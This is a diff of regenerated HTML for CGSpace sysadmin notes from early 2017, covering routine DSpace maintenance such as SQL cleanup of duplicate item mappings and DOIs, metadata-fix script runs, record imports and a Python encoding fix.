7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 409 156
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&#34; 200 41
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update HTTP/1.1&#34; 200 40
</code></pre><ul>
<li>Very interesting&hellip; it creates the core and then fails somehow</li>
</ul>
@ -208,11 +208,11 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>I found an old post on the mailing list discussing a similar issue, and listing some SQL commands that might help</li>
<li>For example, this shows 186 mappings for the item, the first three of which are real:</li>
</ul>
<pre><code>dspace=# select * from collection2item where item_id = '80596';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80596&#39;;
</code></pre><ul>
<li>Then I deleted the others:</li>
</ul>
<pre><code>dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
<pre tabindex="0"><code>dspace=# delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
</code></pre><ul>
<li>And in the item view it now shows the correct mappings</li>
<li>I will have to ask the DSpace people if this is a valid approach</li>
@ -223,24 +223,24 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>Maria found another item with duplicate mappings: <a href="https://cgspace.cgiar.org/handle/10568/78658">https://cgspace.cgiar.org/handle/10568/78658</a></li>
<li>Error in <code>fix-metadata-values.py</code> when it tries to print the value for Entwicklung &amp; Ländlicher Raum:</li>
</ul>
<pre><code>Traceback (most recent call last):
File &quot;./fix-metadata-values.py&quot;, line 80, in &lt;module&gt;
print(&quot;Fixing {} occurences of: {}&quot;.format(records_to_fix, record[0]))
UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
<pre tabindex="0"><code>Traceback (most recent call last):
File &#34;./fix-metadata-values.py&#34;, line 80, in &lt;module&gt;
print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0]))
UnicodeEncodeError: &#39;ascii&#39; codec can&#39;t encode character u&#39;\xe4&#39; in position 15: ordinal not in range(128)
</code></pre><ul>
<li>Seems we need to encode as UTF-8 before printing to screen, ie:</li>
</ul>
<pre><code>print(&quot;Fixing {} occurences of: {}&quot;.format(records_to_fix, record[0].encode('utf-8')))
<pre tabindex="0"><code>print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0].encode(&#39;utf-8&#39;)))
</code></pre><ul>
<li>See: <a href="http://stackoverflow.com/a/36427358/487333">http://stackoverflow.com/a/36427358/487333</a></li>
<li>I&rsquo;m actually not sure if we need to encode() the strings to UTF-8 before writing them to the database&hellip; I&rsquo;ve never had this issue before</li>
<li>Now back to cleaning up some journal titles so we can make the controlled vocabulary:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now get the top 500 journal titles:</li>
</ul>
<pre><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
<pre tabindex="0"><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
</code></pre><ul>
<li>The values are a bit dirty and outdated, since the file I had given to Abenet and Peter was from November</li>
<li>I will have to go through these and fix some more before making the controlled vocabulary</li>
@ -254,10 +254,10 @@ UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15:
<ul>
<li>Fix the two items Maria found with duplicate mappings with this script:</li>
</ul>
<pre><code>/* 184 in correct mappings: https://cgspace.cgiar.org/handle/10568/78596 */
delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
<pre tabindex="0"><code>/* 184 in correct mappings: https://cgspace.cgiar.org/handle/10568/78596 */
delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
/* 1 incorrect mapping: https://cgspace.cgiar.org/handle/10568/78658 */
delete from collection2item where id = '91082';
delete from collection2item where id = &#39;91082&#39;;
</code></pre><h2 id="2017-01-17">2017-01-17</h2>
<ul>
<li>Helping clean up some file names in the 232 CIAT records that Sisay worked on last week</li>
@ -266,20 +266,20 @@ delete from collection2item where id = '91082';
<li>And the file names don&rsquo;t really matter either, as long as the SAF Builder tool can read them—after that DSpace renames them with a hash in the assetstore</li>
<li>Seems like the only ones I should replace are the <code>'</code> apostrophe characters, as <code>%27</code>:</li>
</ul>
<pre><code>value.replace(&quot;'&quot;,'%27')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;%27&#39;)
</code></pre><ul>
<li>Add the item&rsquo;s Type to the filename column as a hint to SAF Builder so it can set a more useful description field:</li>
</ul>
<pre><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Test importing of the new CIAT records (actually there are 232, not 234):</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
</code></pre><ul>
<li>Many of the PDFs are 20, 30, 40, 50+ MB, which makes a total of 4GB</li>
<li>These are scanned from paper and likely have no compression, so we should try to test if these compression techniques help without comprimising the quality too much:</li>
</ul>
<pre><code>$ convert -compress Zip -density 150x150 input.pdf output.pdf
<pre tabindex="0"><code>$ convert -compress Zip -density 150x150 input.pdf output.pdf
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=output.pdf input.pdf
</code></pre><ul>
<li>Somewhere on the Internet suggested using a DPI of 144</li>
@ -289,7 +289,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>In testing a random sample of CIAT&rsquo;s PDFs for compressability, it looks like all of these methods generally increase the file size so we will just import them as they are</li>
<li>Import 232 CIAT records into CGSpace:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
</code></pre><h2 id="2017-01-22">2017-01-22</h2>
<ul>
<li>Looking at some records that Sisay is having problems importing into DSpace Test (seems to be because of copious whitespace return characters from Excel&rsquo;s CSV exporter)</li>
@ -300,22 +300,22 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>I merged Atmire&rsquo;s pull request into the development branch so they can deploy it on DSpace Test</li>
<li>Move some old ILRI Program communities to a new subcommunity for former programs (10568/79164):</li>
</ul>
<pre><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&quot;$community&quot; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&quot;$community&quot;; done
<pre tabindex="0"><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&#34;$community&#34; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&#34;$community&#34;; done
</code></pre><ul>
<li>Move some collections with <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move-collections.sh</code></a> using the following config:</li>
</ul>
<pre><code>10568/42161 10568/171 10568/79341
<pre tabindex="0"><code>10568/42161 10568/171 10568/79341
10568/41914 10568/171 10568/79340
</code></pre><h2 id="2017-01-24">2017-01-24</h2>
<ul>
<li>Run all updates on DSpace Test and reboot the server</li>
<li>Run fixes for Journal titles on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;password&#39;
</code></pre><ul>
<li>Create a new list of the top 500 journal titles from the database:</li>
</ul>
<pre><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
<pre tabindex="0"><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
</code></pre><ul>
<li>Then sort them in OpenRefine and create a controlled vocabulary by manually adding the XML markup, pull request (<a href="https://github.com/ilri/DSpace/pull/298">#298</a>)</li>
<li>This would be the last issue remaining to close the meta issue about switching to controlled vocabularies (<a href="https://github.com/ilri/DSpace/pull/69">#69</a>)</li>
@ -369,15 +369,15 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -50,7 +50,7 @@ DELETE 1
Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -80,12 +80,12 @@ Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -132,7 +132,7 @@ Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
<time datetime="2017-02-07T07:04:52-08:00">Tue Feb 07, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -140,7 +140,7 @@ Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
<ul>
<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
</ul>
<pre><code>dspace=# select * from collection2item where item_id = '80278';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
id | collection_id | item_id
-------+---------------+---------
92551 | 313 | 80278
@ -166,7 +166,7 @@ DELETE 1
<li>The climate risk management one doesn&rsquo;t exist, so I will have to ask Magdalena if they want me to add it to the input forms</li>
<li>Start testing some nearly 500 author corrections that CCAFS sent me:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
</code></pre><h2 id="2017-02-09">2017-02-09</h2>
<ul>
<li>More work on CCAFS Phase II stuff</li>
@ -175,7 +175,7 @@ DELETE 1
<li>It&rsquo;s not a very good way to manage the registry, though, as removing one there doesn&rsquo;t cause it to be removed from the registry, and we always restore from database backups so there would never be a scenario when we needed these to be created</li>
<li>Testing some corrections on CCAFS Phase II flagships (<code>cg.subject.ccafs</code>):</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
</code></pre><h2 id="2017-02-10">2017-02-10</h2>
<ul>
<li>CCAFS said they want to wait on the flagship updates (<code>cg.subject.ccafs</code>) on CGSpace, perhaps for a month or so</li>
@ -215,61 +215,60 @@ DELETE 1
<li>Fix issue with duplicate declaration of in atmire-dspace-xmlui <code>pom.xml</code> (causing non-fatal warnings during the maven build)</li>
<li>Experiment with making DSpace generate HTTPS handle links, first a change in dspace.cfg or the site&rsquo;s properties file:</li>
</ul>
<pre><code>handle.canonical.prefix = https://hdl.handle.net/
<pre tabindex="0"><code>handle.canonical.prefix = https://hdl.handle.net/
</code></pre><ul>
<li>And then a SQL command to update existing records:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;uri&#39;);
UPDATE 58193
</code></pre><ul>
<li>Seems to work fine!</li>
<li>I noticed a few items that have incorrect DOI links (<code>dc.identifier.doi</code>), and after looking in the database I see there are over 100 that are missing the scheme or are just plain wrong:</li>
</ul>
<pre><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
<pre tabindex="0"><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value not like &#39;http%://%&#39;;
</code></pre><ul>
<li>This will replace any that begin with <code>10.</code> and change them to <code>https://dx.doi.org/10.</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;10.%&#39;;
</code></pre><ul>
<li>This will get any that begin with <code>doi:10.</code> and change them to <code>https://dx.doi.org/10.x</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^doi:(10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;doi:10%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>dx.doi.org/10.</code> to be <code>https://dx.doi.org/10.</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org/%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>http//</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^http//(dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http//%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>dx.doi.org./</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%'
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org\./.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org./%&#39;
</code></pre><ul>
<li>Delete some invalid DOIs:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value in (&#39;DOI&#39;,&#39;CPWF Mekong&#39;,&#39;Bulawayo, Zimbabwe&#39;,&#39;bb&#39;);
</code></pre><ul>
<li>Fix some other random outliers:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.5337/2016.200&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;doi: https://dx.doi.org/10.5337/2016.200&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/doi:10.1371/journal.pone.0062898&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Http://dx.doi.org/doi:10.1371/journal.pone.0062898&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.10.1016/j.cosust.2013.11.012&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:dx.doi.10.1016/j.cosust.2013.11.012&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1080/03632415.2014.883570&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;org/10.1080/03632415.2014.883570&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.15446/agron.colomb.v32n3.46052&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Doi: 10.15446/agron.colomb.v32n3.46052&#39;;
</code></pre><ul>
<li>And do another round of <code>http://</code> → <code>https://</code> cleanups:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http://dx.doi.org%&#39;;
</code></pre><ul>
<li>Run all DOI corrections on CGSpace</li>
<li>Something to think about here is to write a <a href="https://wiki.lyrasis.org/display/DSDOC5x/Curation+System#CurationSystem-ScriptedTasks">Curation Task</a> in Java to do these sanity checks / corrections every night</li>
<li>Then we could add a cron job for them and run them from the command line like:</li>
</ul>
<pre><code>[dspace]/bin/dspace curate -t noop -i 10568/79891
<pre tabindex="0"><code>[dspace]/bin/dspace curate -t noop -i 10568/79891
</code></pre><h2 id="2017-02-20">2017-02-20</h2>
<ul>
<li>Run all system updates on DSpace Test and reboot the server</li>
@ -280,12 +279,12 @@ dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agro
<li>Testing the <code>fix-metadata-values.py</code> script on macOS and it seems like we don&rsquo;t need to use <code>.encode('utf-8')</code> anymore when printing strings to the screen</li>
<li>It seems this might have only been a temporary problem, as both Python 3.5.2 and 3.6.0 are able to print the problematic string &ldquo;Entwicklung &amp; Ländlicher Raum&rdquo; without the <code>encode()</code> call, but print it as a bytes when it <em>is</em> used:</li>
</ul>
<pre><code>$ python
<pre tabindex="0"><code>$ python
Python 3.6.0 (default, Dec 25 2016, 17:30:53)
&gt;&gt;&gt; print('Entwicklung &amp; Ländlicher Raum')
&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;)
Entwicklung &amp; Ländlicher Raum
&gt;&gt;&gt; print('Entwicklung &amp; Ländlicher Raum'.encode())
b'Entwicklung &amp; L\xc3\xa4ndlicher Raum'
&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;.encode())
b&#39;Entwicklung &amp; L\xc3\xa4ndlicher Raum&#39;
</code></pre><ul>
<li>So for now I will remove the encode call from the script (though it was never used on the versions on the Linux hosts), leading me to believe it really <em>was</em> a temporary problem, perhaps due to macOS or the Python build I was using.</li>
</ul>
@ -294,15 +293,15 @@ b'Entwicklung &amp; L\xc3\xa4ndlicher Raum'
<li>Testing regenerating PDF thumbnails, like I started in 2016-11</li>
<li>It seems there is a bug in <code>filter-media</code> that causes it to process formats that aren&rsquo;t part of its configuration:</li>
</ul>
